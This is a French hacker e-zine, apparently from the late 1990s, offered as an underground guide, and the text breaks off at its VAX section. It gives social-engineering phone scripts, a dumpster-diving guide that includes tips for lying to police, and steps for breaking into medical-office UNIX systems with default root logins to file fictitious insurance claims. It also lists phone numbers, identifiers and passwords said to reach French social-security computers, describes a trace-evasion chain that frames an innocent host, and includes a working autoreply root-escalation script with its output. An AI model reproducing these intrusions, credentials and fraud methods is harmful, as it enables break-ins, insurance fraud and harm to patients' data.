-------------------------------------------------------------------------------------------- C . H . G . Cyber Hacker's Guide -------------------------------------------------------------------------------------------- Disclaimer : Attention :Le contenu de ce mag peut heurter la sensibilité de certaines personnes.Veuillez attentivement lire ce qui suit, si vous souhaitez continuer la lecture de ce document. Tout ce qui est contenu sur ce site n'est présent qu'à titre indicatif. Nous vous rappelons qu'accéder, de façon consciente ou non à un ou des systèmes, ou excéder les droits d'accès alloués, et par ce comportement, obtenir n'importe quel type d'information est illégal. Causer l'interruption d'un programme, d'informations, de code, de commandes sur un système sans autorisation est illégal. Cyber-Hack ainsi que les autres auteurs de ce mag n'assume absolument aucunes responsabilités des conséquences que pourrait avoir sur vous ou votre environnement tout ce qui est présent dans ce zine. Cyber-Hack et tout ce qui s'y rattache ne peut être tenu comme responsable d'une mauvaise utilisation de ce qui est présenté ici. Attention, toutes les informations sont fournies "tel quel", la précision ou la justesse des informations présentes dans ce mag sont sujettes à des conjectures. Aucune garantie implicite, ou non implicite, et d'aucun type que ce soit n'est assurée par Cyber-Hack ou par tous ceux qui s'y rattachent de près ou de loin. Vous utilisez les informations qui sont fournies dans ce mag à vos propres risques! Cependant nous nous engageons à essayer de fournir le moins d'informations erronées qu'il nous est possible. Si vous utilisez des sources ou des textes présentés ici, nous vous demandons que leur origine soit citée. Tous les personnages mentionnés dans cet e-zine sont purement et simplement fictifs. Toutes ressemblances avec des personnes, vivantes ou décédées, est purement accidentelle et n'est le fruit que de la coïncidence. Finalement :la lecture de ce document est réservé aux seuls membres de l'underground informatique qui agréant aux points précédents ne font pas partie des catégories suivantes : employé d'un état, d'une institution et/ou agence gouvernementale, de la police, de l'armée, de la SEFTI, de la DST, de la DGSE, de la GRC ou de toute organisation affiliée de près ou de loin aux précédentes ainsi qu'à toutes personne ayant un rapport direct ou indirect avec un quelconque service similaire. L'accès a ce texte par ces mêmes personnes ou institutions constituent donc une violation du copyright car cela revient à lire des informations propriétaires ! (c) constituant ainsi une atteinte à la vie privée.. A bon entendeur.... L'équipe de Cyber-Hack. Préface : "Vanitas Vanitatis = Vanité tout n'est que vanité. Un jour on prend conscience de sa vanité, de sa duplicité et on tombe de (très) haut : C'est LA CHUTE" Prisci. C'est nous tous, membres de l'underground qui sommes encore les seuls qui puissions combattre tous les Big Brother en puissance qui s'annoncent. Pour cela il n'y a qu'un seul moyen, nous devons être forts et la plus grande des forces, c'est... la connaissance.. Ce zine ne me rapportera rien sauf peut être la satisfaction de faire parti des milliers d'autres sources d'informations qui peuplent aujourd'hui Internet et nous aident à progresser dans notre art et notre lutte. "Quelle est la limite l'exès quand commence l'exès ? Ne plus pouvoir s'arrêter..." Sylvie. Bonne lecture! Brain Override -------------------------------------------------------------------------------------------- TABLE DES MATIERES -------------------------------------------------------------------------------------------- I] Les bases du social Engeenering. #Brain Override# II] Le trashing. #Brain-Rage# III] Le Réseau de la C.P.A.M. et de la santé en France #Brain Override# IV] Une petite technique anti-bust. #Brain Override# V] Note sur le phreaking en france. #Crash Test# VI] Le livre orange, l'utopie qui nous sert. #Phoenix# VII] Underground : portrait d'un hacker. #Brain Override# VIII]Autoreply #Ultrason# IX] Petit rappel sur les VAX #Brain Override# X] Cadeau #Brain Override# XI] Liste des commandes de l'IBM AS/400 #Crash Test# XII] Les beaux parleurs ! #Brain Override# XIII] Greets ! #*@*.*# XIV]Conclusion #Brain Override# -------------------------------------------------------------------------------------------- I]Les bases du social Engeenering Cet article était déjà paru dans frhack1, mais c'était la version non corrigée. Le voici donc, un peu newbie, tel qu'il aurait du paraître il y a quelques mois. Vous devez vous dire, mais que vient faire du social dans un mag de hack. Eh bien c'est très simple, la plupart de mes hacks réussis, je les dois à cette méthode. En effet le S.E. permet de s'attaquer à la plus grosse faille du système de sécurité d'une entreprise: Le personnel . Le S.E. est plus simplement l'art du caméléon, celui de l'usurpation de l'identité d'autrui, afin d'accéder à des information dites condidentielles. D'abord voici quelques conseils de base : Préparez une feuille que vous garderez sous les yeux afin de pouvoir rester parfaitement cohérent, qui mentionne précisément qui vous êtes, votre position dans votre société, etc et ou vous préparer le synopsis du scénario de votre conversation en essayant de prévoir les éventuelles questions que votre interlocuteur peut être amené à vous poser, ainsi donc que quelques réponses prêtes à fournir. Essayer aussi de prévoir un peu de bruit d'ambiance, style bureau, salle d'informatique etc. et éventuellement quelques musiques d'attentes que vous balancerez directement dans votre téléphone. Faites toujours des phrases complètes en employant un vocabulaire très technique, et surtout beaucoup d'acronymes afin que la personne à l'autre bout du fil se trouve placée en situation d'infériorité ce qui va lui donner la tendance à accepter comme vrai ce que vous lui dite. Vous pouvez essayer de vous faire passer pour : Un acheteur potentiel Un client actuel Un sondage ou une enquête statistique Un magazine La radio.. à la limite, la télé il faut vraiment que vous ayez un demeuré au téléphone ! Un technicien telecom, EDF..etc.. La police marche parfois bien aussi. Ex : S. Société Datronic, bonjour, Gisèle Dubois. V. Bonjour, Josée Lespare de Pc-Expert. Je suis chargé d'une enquête visant a l'évaluation des parcs informatiques dans les entreprises françaises et de leur équipement hard et soft pour le Laboratoire Ziff-Davis France. S. Heu..Oui je vais voir si... V. J'aimerai vous posez quelques questions sur "Les architectures installées" ou bien les "Os Utilisés" Vous pouvez m'aidez ? S. Attendez un instant je vais voir si je peux vous passer le Service informatique. V. Je Je vous remercie vous êtes charmante S. De rien je vous en prie (Enfin quelqu'un qui lui a dit dans l'année) Voilà je vous passe Olivier Dotrini, du service informatique. V. Je vous remercie encore, bonne journée. S. Olivier Dotrini, bonjour V. Bonjour, Josée Lespare de Pc-Expert. Je suis chargé d'une enquête visant a l'évaluation du parc informatique français et de son équipement hard et soft pour le Laboratoire Ziff-Davis France. S. Oui que puis je faire pour vous ? V. Eh bien nous essayons d'évaluer la répartition des OS et des différents matériels dans les entreprises françaises. C'est pour ca que j'aimerai vous posez quelques questions. S. (Passons sur la réponse ou notre ami nous décrit en quelques mots plus ou moins long ca varie du tout ou rien le parc informatique contenant X serveurs etc..etc... a vous de poser les bonnes questions) V. Et bien je vous remercie vivement d'avoir répondu à mes questions. Pouvez vous éventuellement me dire si et quand je pourrai vous recontacter pour de plus amples informations ? S. Oui aucun problème Je suis la le Lundi le mardi et le jeudi. sinon vous pouvez demander Fabrice Boudier qui sera en mesure de vous renseigner. V. Et bien merci beaucoup et peut être a bientôt. Au revoir. In ne vous reste plus qu'à appeler quand Mr Dotrini n'est pas là et demander à parler à Mr Boudier. Olivier m'a dit que etc.. Sinon il y a une autre méthode qui s'appelle le reverse Engeenering, la cela consiste en gros à donner une occasion au lamer à l'autre bout du fil de vous montrer toutes ces compétences en matière de micro-informatique : Salut c'est Hervé le stagiaire du niveau 2, Je vous appelle parce que j'ai un problème.. Vous vous y connaissez en informatique ? A coup sur la personne sera fière de montrer son immense savoir ainsi que... sa bêtise ! Continuez ainsi : Alors voilà, Quand j'allume l'ordinateur, il me demande un login (prononcer LOGAIN, comme ca vous aurez vraiment l'air stupide, vous épellerez le mot si nécessaire..) Alors je tape le mot qu'on m'a donné ROSS Puis après il me demande un password et la je tape l'autre mot qu'on m'a donné HERV01, et puis là çà marche pas...etc..etc... Voilà, on pourrait écrire un livre entier sur le SE et ses techniques mais là vous aurez quelques bases pour appréhender le sujet. N'oubliez pas une autre notion importante, rien ne remplacera la pratique. Brain Override -------------------------------------------------------------------------------------------- -------------------------------------------------------------------------------------------- II] Le Trashing Je vais vous parlez dans cette phile du Trashing. Pour moi, c'est une technique pouvant aussi aider dans l'art du Social Engineering. Le truc consiste en gros (mais vraiment gros !) a allez fouiller dans les poubelles pour récolter des informations et on en trouve ! ex: (des login, des Passwd, nø de VMB, PBX, etc...) :))))))) Alors la première chose à faire est de localiser les poubelles ainsi que le moment où on les sort. Vous avez le choix.. ou bien vous restez en planque devant la boite, ou bien vous téléphonez en vous faisant passer pour une société genre hygiène et sécurité et après un pseudo sondage vous balancez vos question. Encore une chose un truc aussi très efficace consiste à pogner des informations pendant les visites qu'organisent certaines entreprises. Là elles ne sont pas méfiantes et c'est facile d'envoyer la main dans une poubelle de bureau ou bien de regarder quelques écrans... Bon, alors pour commencer, il nous faut les éléments suivants : }-Des fringues sales }-une lampe torche }-Un sac rempli de cannetes de coca ou autres (meme de la KrO, c'est bon !) }-Un autre sac pour mettre vos trouvailles... }- des gants au cas ou y'aurais un maniac qui relève les empreintes digitales.. (oui, oui, je suis parano !) }-Du cul, Du cul, du cul ! }-Etre vraiment en manque pour faire ce truc de 'ouf... Bon, maintenant que vous êtes paré(e)s, allez visitez les poubelles de la sociéte que vous aurez repérée quelques jours avant. Regardez bien aux alentours s'il n'y a pas des caméras fixées sur les poubelles (et oui, il y a des cons partout !), si c'est bon, restez sur un banc ou un truc a proximité de la benne pour voir si in n'y a pas un rambo de la sécurité qui passe avec son klebs. Y'en a un ? Pas de problèmes ! Repérez juste les intervalles auxquelles il passe devant votre benne et assurez vous que son bureau ne donne pas sur la benne. ( je vous rappelle que c'est tres rare d'avoir affaire a ce genre de surveillance :)) ) Toutes ces précautions sont prises ? alors plus qu'une chose : {{{{{-#TrAsHiNg RuLeZ !!!!#-}}}}} Bon alors vous prenez votre sac plein de cannettes...Eh, vous là ! Pourquoi des canettes ? Ben parce que si la grand-mere du coin vous a balancé et a appelé les flics, et bien vous pourrez dire tout simplement que vous aidez une association pour le recyclage des "emballages en aluminium" (ne dites pas cannnetes), le putain de fonctionnaire ne pourra rien dire a un mec qui essaye de sauver la planète ! Donc c'est dans la poche ! Il vous dira que c'est bien et s'il vous prend la tête, abandonnez, revenez plus tard et n'oubliez pas d'égorger la grand-mère ;-) Sinon, passons a l'action : Vous sautez dans la benne comme James Bond, Avec votre lampe, vous eclairez tous les papiers qui passent...prenez tout ! Les relevés de comptes, les factures, les logs, les codes sources (si si ! J'ai un jour trouvé des codes sources d'un prog de comtabilité, avec les 2 feuilles décrivant la routine du mot de passe !!!!!). Prenez tout mais ne remplissez pas votre sac a fond quand même. Jetez un petit coup d'oeil aux feuilles en regardant le titre en haut pour savoir de quoi ca parle. Je veux dire, ne prenez pas des trucs du genre "Facture de 30 Kilos de petit pois poir le resto etc... Bon, maintenant barrez vous en vitesse par un chemin différent de celui par lequel vous êtes arrivé, et pensez a ne rien oublier sur place ! Selon les types de poubelles vous pouvez carrément vous barrer avec le où les sacs poubelles (plus pratique si vous avez une voiture qu'il faudra tout de même nettoyer...) pis aller dans un coin tranquille et tout dépecer tranquillement... Voilà c'est tout, arrivé chez vous, vous trierez tout cà et si vous avez de la chance de trouver des password, ben vous savez quoi faire !!! Voilà, et si vous vous faites attraper, et que le flic est en manque d'action dans sa vie de paysan et de lamerZ et qu'il vous emmène au poste parce qu'il a vu "Demolition Man" hier soir sur TF1, alors y se sens plus. C'est une fois au poste qu'il faut dire toujours la même chose (l'histoire des cannetes...) et dire que vous ne connaissez rien en ordinateur (s'il vous pose la question bien sur, faudrait pas vous trahir !!!!!), que vous ne connaissez pas Internet, que vous savez a peine vous servir d'un téléphone, pleurez comme un malade (du style : MAAAAAAAAAAAAMAAAAAAAAANNNNNNNNNN, [snif !],JE VEUX MA MAMANNNNNNNNNNNNNNN) en fin bon, faut pas exagérer non plus et comme y auront surement autre chose a faire et ben ils vous relacherons dans l'heure. Sachez de toute manière qu'il n'est pas interdit en france de fouiller dans les poubelles... +++Brain-Rage+++ -------------------------------------------------------------------------------------------- -------------------------------------------------------------------------------------------- III]Le réseau de la C.P.A.M. et de la santé en France. Sachez tout d'abord chers lecteurs que j'ai longuement hésité à vous fournir ces infos... La raison est simple : La première est que là, si vous vous faites buster, c'est plutôt grâve.. En effet, là vous aurez droit directement aux services secrets. Donc vous devez être EXTREMEMENT PRUDENTS. La seconde raison est le pouvoir sur les autres que vous pouvez acquérir ainsi.. Changer ce type d'informations sur des individus peut changer leur vie..ou bien la détruire. Certains aussi vont voir là une nouvelle méthode pour ce faire du blé. En effet quoi de plus facile que de se faire rembourser des examens fictifs. Surtout en super-utilisateur.... Vous aurez aussi droit à quelques infos techniques sur Vitale etc.. Pour commencer une petite de liste de UIN à laquelle vous pouvez essayer d'appliquer l'art du SE... Essayer de vous faire passer pour une secrétaire médicale par ex qui comprend pas. A vous de voir ;) : - Al: 5988413 - Ben: 4089804 - Chant: 15169696 (Talala) - Dide: 3993030 - Gil : 6797035 - Guitou : 2455311 (Cobra) - Jack: 2557343 - Jay: 15224536 - Jo: 2537339 - K: 5168146 - Mark: 15058851 - Marteloide: 8703100 - Marju: 15056846 (Greedo) - Mimi: 8630626 - Nad: 6256902 (Naben) - Phil: 4369465 - Richard: 7797063 (rduputel) - Rousse: 7733465 - Sabine; 15088525 - Sep: 14960423 - Sky: 7433989 - Titi: 761184 (thlm) - Vivi: 3019161 - Xav: 2478733 Le plus facile pour commencer, c'est de pénétrer un cabinet médical. Je vous conseille les cabinets de radiologie, ou encore de scanners... pour vous faire la main. Pour ca Vous prenez le numéro de teléphone du cabinet que savez au moins informatisé.. Ensuite, il n'y a généralement qu'un chiffre qui change dans le numéro ex: 04-42-26-08-01 04-42-26-08-02 Après quelques essais, vous aller finir par tomber sur une bécane UNIX. Le système va vous demander un login et un password.. PAS DE PANIQUE ! :) taper ROOT.. pour le pass, bon aller, je suis trop gentil, vous allez additioner tous les chiffres de la date, EX: Pour le 17/12/98, on va avoir : 1+7+1+2+9+8=28 Voilà le pour le PASS. Si ca ne marche pas, tapez ais à la place du nombre ;)), ensuite tapez tele. (N.D.R.L.! Ce système est très souvent employé sur de nombreux systèmes, dire que certains Admins prennent çà, pour une combinaison impénétrable...) Là vous aller arriver dans le programme. Il s'appelle MODULANCE. Il y a peu d'aide dans le programme mais tout est assez explicite pour que vous puissiez vous en sortir. Vous pouvez à loisir vous créer un dossier, des feuilles de soins et même rajouter que ca a été payé ;) P.S. pour se déloger du prog, 888 F1 et si ca ne marche pas : 131 F1 Je rapelle que pour les radios c'est le cabinet qui se charge d'envoyer ce qu'il faut à la C.P.A.M, pour que vous soyez remboursés.. De là à se faire rembourser des examens jamais passés, il n'y a qu'un pas... Dans ce programme vous pourrez constater qu'il y a des fonctions réservés à la télétransmission. Une transmission qui se fait donc du cabinet à la C.P.A.M. voire à la mutuelle. Et tout çà est totalement automatique. Donc si vous faites une télétransmission et que vous sniffer les échanges. Les pus doués d'entre vous (faudrait pas trop en dire aux lamers quand même comprendront assez aisément le protocole assez spécifique utilisé. Vous pouvez aussi repomper le prog et le décompiler. Si je ne dis pas de bétise le source est peut être avec, sinon, si ca peut vous aider, ca a été programmé en COBOL (Beurk !). Si vous pompez le prog., pour vous faire passer pour le cabinet (n'oubliez pas quand même, de vous servir de leur ligne comme relais, ils ne sont pas si cons à la C.P.A.M) il faut vérifier quelques points pour que la télétransmission fonctionne.. Dans le prog, en 53, pour le type de connection, choississez CPAIX, pour le numéro de tel: T, le numéro de tel (ex : 04-91-41-81-99) <----oui oui c'est un vrai ..niark ! niark ! ensuite faites un uuinstall faites 4 puis 1, fiche patient, saisi : TCPAM. Ensuite vérifiez le fichier .profile et si elle y est, enlevez la ligne : HZ=50 Pour la préparation, allez en 266, choississez la norme B2, faites F8, tout saisir, puis 270 pour la télétransmission. Si vous voulez tester le modem, il faut utiliser kermit : # /u/bin/kermit C-Kermit 5A(190), 4 Oct 94, for SCO UNIX/386 Copyright (C) 1985,1994, Trustees of Columbia University in the City of New York, Type ? or HELP for help. C-Kermit>set line /dev/tty2a C-Kermit>set esc 01 C-Kermit>connect Connecting to /dev/tty la, speed 9600. The escape charater is Ctrl-A (ASCII 1 ,SOH) Type the escape character followed by C to get back, or followed by ? to see other options. atz OK atdt0votre numéro de portable par ex. Si le numéro est composé correctement, c'est bon signe. Mon ami Crash-Test s'agite à coté de moi en trouvant que j'en ai déjà trop dit. Mais bon je vais encore vous faire quelques petits cadeaux. Les fichiers télétransmis sont à disposition dans le répertoire /u/rad/fic/cpam/alma288 Pis je vous aide encore, voici quelques numéros directs sur les ordinateur de la sécurité (où çà ? :)) sociale : 04-91-41-81-99 04-78-24-32-95 03-20-43-36-36 : NUMX25=01011DC3825981; IDDEM=SI38259814200018; MDPAS(ca voudrait pas dire mot de passe çà ?)=BRDOTEPA ou BRD0TEPA ; Tiens, voilà du transpac, voilà du transpac... 08-36-06-44-44 08-36-06-24-24 Et même pour les idiots qui ne trouveront pas eux-même, un numéro d'identificateur valide : 38259814200018, sur T0,00836062424 Une dernière chose si çà ne marche pas vous pouvez regarder dans cd /temp et effacez le fichier QSP et relancez.. Bon cette fois j'en ai assez dit, le reste vous le découvrirez tout seul, sinon vous n'apprendrez rien ! A peut être que la prochaine fois je vais vous expliquez comment pirater les réseaux minitel et audiotel en france : ça dirait quelqu'un de laisser son propre message d'accueil ? +++Brain Override+++ -------------------------------------------------------------------------------------------- -------------------------------------------------------------------------------------------- IV]Une petite technique anti-bust. Cette technique est hyper simple et bien que l'appel reste retraçable, ce n'est pas évident Vous appelez un PBX, duquel vous en appelez un autre etc... La pluspart d'entre vous savent déjà utiliser les 080090.... à leur avantage de cette manière. Malheureusement si vous vraiment un gros coup, on vous retracera quand même donc voivi une petite méthode pour leur donner du fil à retordre. Personnellement :en utilisant cette méthode + un jammer + du spoof et une connexion pirate je n'ai encore jamais eu de problèmes... Vous commencer par vous connecter sur votre 1èr PBX, jusque là pas de prob. Ensuite vous composez un autre numéro de PBX, vous obtenez de nouveau votre tonalité, et là au lieu de vous logger sur un 3è, vous refaites le premier numéro.. puis encore le 2è, une dizaine de fois. Ce qui donne cune connection de ce type : Vous--->PBX1------>PBX2-------->PROVIDER | | |<---------| Vous pouvez évidemment compliquer la sauce en rajoutant d'autres PBX. L'avantage de la technique précédente c'est que s'il veulent vous retracer et qu'ils retombent en boucle sur les même PBX, il croient que vous les avez roulés... Personnellement voici la méthode que j'utilise moi, en france et qui a ma fois toujours bien marché...jusqu'à présent : Brain Override--->Jammer---->PBX1----->PBX2----->PBX3--->PBX4---->PROVIDER(account pirate) | 17 fois | | |<--------| | | Cible<-----------SPOOF(X3)<---Daemon<-------SPOOF1<-/-----| | | PIGEON Pour information, sachez que le premier spoof est un serveur sur lequel j'ai de gros access et sur lequel je fais tourner un daemon qui surveille tout ce qui est en provenance de la cible (c'est une sorte de proxy mais adapté précisemment à mes besoins. Le pigeon c'est un blaireau sur lequel j'ouvre un port à partir du spoof1 et si le Daemon détecte le moindre paquet suspect qui arrive, il ferme ma connection et redirige tout vers le pigeon. Bon OK C'est pas cool pour le pigeon mais bon... Au fait après çà ne soyez pas assez stupide pour recommencer avec le spoof1 qui évidemment sera surveillé. Vous devriez programmer le daemon pour qu'il s'efface tout seul ainsi que toute trace de votre connection. Vous pouvez également encore compliquer la sauce en passant par d'autres type de réseaux ( Voir dernier HVU), je n'ai jamais essayé mais ca rajoute une barrière. Avec çà vous pourrez hacker déjà plus tranquillement.... +++Brain Override+++ -------------------------------------------------------------------------------------------- -------------------------------------------------------------------------------------------- V] Note sur le phreaking en france Ah.. ce Brain.. un inconscient.. Si j'étais pas toujours là à lui crier déconnecte, il y a longtemps qu'il serait au trou ! Je vous le dit. Bon une petite note à nos amis phreakers français.. (P.S. c'est une fille qui a apprit à Brain, les technique du phreaking..). Pour ceux qui utilisent une black box, vous savez certainement qu'il est déconseillé de rester plus d'une demi-heure.. Et les gars réveillez vous ! Actuellement au moment où j' écris ces lignes, FT est capable de vous repérer en moins de 4 min ! C'est le cas pour quasiment toutes les rares box qui marchent en France. Idem pour les cabines téléphoniques, si vous coupez un fil, bip bip bip... On m'a même parlé, je n'ai pas encore vérifié, d'un appareillage STANDARD qui les alerte si la résistance se trouve un peu trop modifiés. Alors, phreakez bien... mais faite attention. P.S. SVP, dite à Brain de pas me taper pour l'histoire de la fille. Ca l'énerve chaque fois que je lui en reparle.. +++Crash Test+++ -------------------------------------------------------------------------------------------- -------------------------------------------------------------------------------------------- VI] Le livre orange, l'utopie qui nous sert... Les systèmes informatiques sont sensés être sécurisés. Le livre orange donne d'ailleurs les critères auxquels doivent normalement se souscrire tous les systèmes pour disposer d'une bonne sécurité. Vous comprendrez alors pourquoi il n'existe aucun système qui soit impénétrable. Il n'existe actuellement aucun système qui puisse souscrire à tous ces critères. La faille que vous devez trouver... c'est le critère manquant. Critères de sécurité selon le livre orange Voici les critères auxquels doivent normalement se souscrire tous les systèmes ! Identification et authentification Gestion des autorisations d'accès Contrôle des autorisations d'accès Contrôle des justifications Réinitialisation Garantie de fonctionnalité Non prise en compte des erreurs Contrôle des transmissions Les utilisateurs doivent se déclarer au système au moment de la connexion, prouver leur qualité d'utilisateur authorisé, s'identifier et s'authentifier.. La procédure de connexion sous UNIX en est un exemple classique. Il reste cependant possible d'imaginer des systèmes autres, plus vastes et plus sur, offrant une protection accrue. Tous les fichiers et objets de la communication inter-processus (par exemple les sémaphores ou les files d'attente de message) doivent être dotés de droits d'accès. Pour UNIX, c'est le cas à tous les niveaux. Tous les fichiers et tous les objets de communication inter-processus contiennent au minimum des autorisations de base en ce qui concerne la lecture, l'écriture et l'exécution. Il faut également définir individuellement les personnes aptes à modifier ces droits d'accès et comment cette opération doit se dérouler. Les possibilités d'UNIX dans ce domaine sont la plupart du temps amplement suffisantes. Il suffit pourtant de jeter un coup d'oeil sur d'autres systèmes d'exploitation comme Novel Netware ou VM/VMS pour constater qu'il existe d'autres solutions pour gérer les droits d'accès. Dès qu'un utilisateur essaie d'accéder à un fichier ou à un objet de communication inter-processus, il faut une vérification des droits d'accès. Plus un contrôle est fréquent et plus le système est censé être sur. Tous les événements touchant à la sécurité du système doivent faire l'objet d'un enregistrement, d'un journal. Sous UNIX, il s'agira par exemple des modifications des droits d'accès (commandes chmod, chown, chgrp) ou l'exécution de programmes dotés du Set-User-ID-Bit. Pour ces événements est créée une ligne de journal stockée dans un fichier. Cette procédure est aussi appelée Auditing. Les systèmes UNIX de certification C2 proposent tous ce système d'audit. Il permet en particulier à l'administrateur de savoir quel utilisateur a utilisé quel fichier. La réinitialisation est la capacité d'un système à mettre à disposition des moyens de travail 'des blocs de données du disque dur ou des pages de la mémoire) sans que personne ne puisse en tirer des conclusions quant à leur emploi précédent. Un bloc de données du disque dur doit donc être vidé de toutes les informations qu'il contenait précédemment, avant d'être réutilisé par un autre processus. De base n'était remplie que très partiellement dans les anciens systèmes UNIX. Que fait le système si des erreurs surviennent dans tous les domaines ? Il peut par exemple en arriver que le noyau du système d'exploitation ne trouve plus de porte de sortie correcte à la situation d'erreur. Dans ce cas apparaît sur la console un message avec le terme peu optimiste de PANIC. Et si vraiment la situation est terrible, vous verrez peut-être même un jour le terme DOUBLE PANIC (mais nous ne vous le souhaitons pas). Avec un système dit sur, la correction de l'erreur doit être possible sans que la sécurité de l'ensemble du système ne soit mis en cause. La question de la garantie des fonctionnalités concerne les tâches que le système doit encore être en mesure de réaliser même si des erreurs surviennent dans certains domaines. Que se passe-t-il si, par exemple, un terminal déclare forfait ou si une carte réseau pose problème ? Est-ce que l'ensemble du système en subira les conséquences ? Dès qu'on essaie de transférer des données d'un système sur un autre, ce ne sont plus tant les droits d'accès qui sont en cause, qu'il s'agisse de leur vérification ou de leur gestion. Pour ces opérations particulières interviennent d'autres fonctions de sécurité. Pour ces contrôles des transmissions, il est demandé à ca que le système contrôle sérieusement l'identité du partenaire de la communication et qu'il vérifie que les données aient bien été lues et traitées. Il est bien évidemment interdit à quiconque d'extérieur d'interrompre cette communication, d'intervenir ou encore de participer à l'opération. Selon la classification IT les critères de sécurité sont classés de F1 à F5, cas catégories reprenant dans les grandes lignes les distinctions faites dans l'Orange Book. Cette classification est complété par les catégories F6 ) F10, s'appliquant plus spécialement aux systèmes de base de données et aux réseaux publics. Cette classification de systèmes d'après les critères de sécurité est complétée par des classes de qualité, s'échelonnant de Q0 ) Q7 et portant plus spécifiquement sur la qualité des mécanisme de sécurité. Ainsi un système informatique bénéficie toujours d'une double classification, sécurité et qualité. Vous pourrez bientôt trouver le vrai "orange book" complet sur notre site et j'envisage d' ailleurs de le traduire. Si le job interesse quelqu'un.... +++Phoenix+++ -------------------------------------------------------------------------------------------- -------------------------------------------------------------------------------------------- VII] Underground : portrait d'un hacker. Vous avez surement lu sur le web des centaines de textes qui donne le portrait du hacker "type". Et bien ce ne sont que des foutaises. S'il est vrai que nous sommes tous liés par une passion et parfois des objectifs communs, nous sommes pourtant tous bien différents. Là c'est de moi que je vais parler. Je me fou de ce que vous en penserez, ceci est mon histoire, elle n'a rien d'extraordinaire, la pluspart ne se reconnaîtront pas dans ce portrait, vous comprendrez alors que chacun d'entre vous dispose de quelque chose que l' autre n'aura jamais. Voilà pourquoi vous ne valez pas forcemment moins qu'un autre... Tout à commencé pour moi à 8 ans. Les jeux des autres enfants et leurs plaisanteries idiotes m'atterre. Aujourd'hui c'est le réveillon de Noël, il est approximativement 18H00, à Auchan ils ont fait une erreur de commande, des milliers de M.S.X. commandés au lieu d'une centaine. Ils faut se débarrasser des bécanes, on solde à 500 Francs.... Ma mère se jette sur l'occasion... pour 500 Francs ca sera jamais perdu.... Je branche la bécane sur le moniteur qu'ils m'ont acheté avec, chic l'écran s'allume, c'est écris O.K. en blanc sur fond bleu et il y a 5 mots écris en bas.. A quoi ca sert ? 24 Heures après, je n'ai toujours pas dormi, comme je n'arrivais pas à faire marcher le jeu qui allait avec, j'ai programmé un morpion.. et ça marche cool ! La bécane fait ce qu'on lui dit et en plus elle ne mort pas... En face de chez moi habite un ingénieur de chez Thomson Electronic, un jour, il déménage.. je passe à coté de la poubelle il y a plein de trucs dedans plein de cartes électronique et plein de bouquins.. sur certains il y a même écrit : "confidentiel" Dans toute cette paperasse il y a une drôle de carte isolée sous un sachet antistatique, avec il y a un livret : "comment fabriquer un "modulateur/démodulateur"... Bah on lit un peu et on essaye.. avec le schéma fournit du port série du MSX et le schéma sur la doc, on voit qu'il y a des correspondances.. bon ok on essaye. Avec un petit programme basic en envoie des informations au nouveau joujou.. y a des LED qui s'allument dessus.. c'est cool... y un autre livre.. c'est écrit le réseau TRANSPAC.. on continue de lire un peu et là c'est parti pour de bon, encore plus fort que l'adrénaline, propulsé dans le monde des réseaux et du microprocesseur... C'est cool je n'ai pas la seule bécane au monde.. il y en a d'autre et on peut leur parler avec le téléphone.. Mince certaines ne veulent pas parler.. elle demande un login et un mot de passe..un peu plus de doc, sur TRANSPAC et sur les BBS, on essait quelques trucs.. et ca marche, en plus dessus on trouve plein de progs... Oups c'est la fin du moi la facture de téléphone est trop grosse.. il faut faire quelque chose.. Tiens on peut aussi parler aux bécanes de FT, la facturation est accessible assez simplement : erreur FT---> remboursement, ouf on a eu chaud, mais ça a l'air dangereux, il faut trouver autre chose. Je n'ai que 11 ans à ce moment là mais j'ai refourgué quelques progs à un gars qui connaît quelqu'un chez FT il me donne un truc : combinaison + 1 + mon numéro + numéro à appeler et miracle 0 F /min ... Le temps passe ca marche plus... J'ai acheté un sans fil au marché aux puces.. hum il y a de la tension dans un des câbles qui arrive à la prise téléphonique.. ca doit être pareil au poteau.. Et Hop ! La base en haut d'un poteau téléphonique à 50 m de la maison.. chic, le modem acoustique, il marche... Un jour je joue un peu trop avec une bécane, depuis, j'ai eu un P.C., La gendarmerie arrivera quand même jusqu'au poteau téléphonique... Cette fois on à eu chaud... on arrête.. Mais non je en peux pas la tentation est trop forte.. on y retourne.A la télé vous avez parlez de moi... un CRIMINEL informatique... véritable terroriste des temps modernes à encore frappé... terroriste...criminel ?? hum il doit y avoir une erreur quelque part.... Je n'ai jamais tué personne... Vous vous dites justicier quand vous nous arrêtez, mais savez vous vraiment qui nous sommes ?? Chez nous il n'y à pas de dogme ni de préjugé. Chez nous les valeurs existent encore, on juge les gens pour ce qu'ils sont vraiment pas sur leurs apparences. Il n'y a que dans notre monde, sur le septième continent qu'est Internet, qu'existe la liberté totale d'expression et de communication.. C'est vous qui construisez des armes de plus en plus destructrices qui renversez des gouvernements ou affamez les peuples et vous osez nous appeler des criminels.. Des crimes nous ? Nous n'en avons commit qu'un seul.. C'est le crime de la curiosité, et celui de vous être toujours supérieur... Un crime en effet impardonnable à vos yeux d'avoir été doté d'une intelligence et d'une soif de connaissance que vous n'aurez jamais.... +++Brain Override+++ "La violence est le dernier refuge de l'incompétence..." Isaac Asimov "La connaissance est la plus grand des pouvoirs, Le savoir la plus grande des puissances" +++Brain Override+++ ------------------------------------------------------------------------------------------- ------------------------------------------------------------------------------------------- VIII] Le bug Autoreply Ce truc est assez vieux, mais je trouve tous les jours encore des systèmes où çà marche... donc : A priori cela marche sur tous les systèmes qui disposent d'une installation standard de : Elm Mail System. Autoreply peut, en autre, être utilisé pour créer des fichiers root avec le mode 666. L'exemple qui suit, permet de devenir super-utilisateur en modifiant le fichier .rhosts ; Créez le script suivant que vous nommerez fixrhosts : #!/bin/sh # # fixrhosts rhosts-file user machine # if [ $# -ne 3 ]; then echo "Usage: `basename $0` rhosts-file user machine" exit 1 fi RHOSTS="$1" USERNAME="$2" MACHINE="$3" cd $HOME echo x > "a $MACHINE $USERNAME b" umask 022 autoreply "a $MACHINE $USERNAME b" cat > /tmp/.rhosts.sh.$$ << 'EOF' ln -s $1 `echo $$ | awk '{printf "/tmp/arep.%06d", $1}'` exec autoreply off exit 0 EOF /bin/sh /tmp/.rhosts.sh.$$ $RHOSTS rm -f /tmp/.rhosts.sh.$$ "a $MACHINE $USERNAME b" exit 0 Ensuite : > % id uid=97(8lgm) gid=97(8lgm) groups=97(8lgm) > % ./fixrhosts ~root/.rhosts 8lgm localhost You've been added to the autoreply system. You've been removed from the autoreply table. > % rsh localhost -l root csh -i Warning: no access to tty. Thus no job control in this shell. # Voilà, de nombreuses versions sont maintenant patchées mais on en trouve encore sur lesquelles çà marche. +++Ultrason+++ ------------------------------------------------------------------------------------------- ------------------------------------------------------------------------------------------- IX] Petit rappel sur les VAX Quand 